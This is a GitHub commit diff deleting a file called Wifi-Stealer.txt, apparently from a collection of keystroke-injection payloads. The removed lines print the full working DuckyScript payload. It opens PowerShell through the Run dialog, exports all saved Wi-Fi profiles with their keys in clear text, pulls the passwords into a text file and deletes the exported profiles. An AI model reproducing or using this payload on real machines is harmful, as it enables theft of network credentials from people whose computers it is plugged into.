Delete Wifi-Stealer.txt

This commit is contained in:
UberGuidoZ 2022-07-16 21:40:47 -07:00 committed by GitHub
parent 723d9d2005
commit 9ebaf7f9d4
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -1,9 +0,0 @@
REM Wifi-Stealer
REM By 7h30th3r0n3
GUI r
DELAY 300
STRING powershell
ENTER
DELAY 300
STRING cd Desktop;netsh wlan export profile key=clear;Select-String -Path Wi-Fi-* -Pattern 'keyMaterial'>0.txt;del Wi-Fi-*;exit
ENTER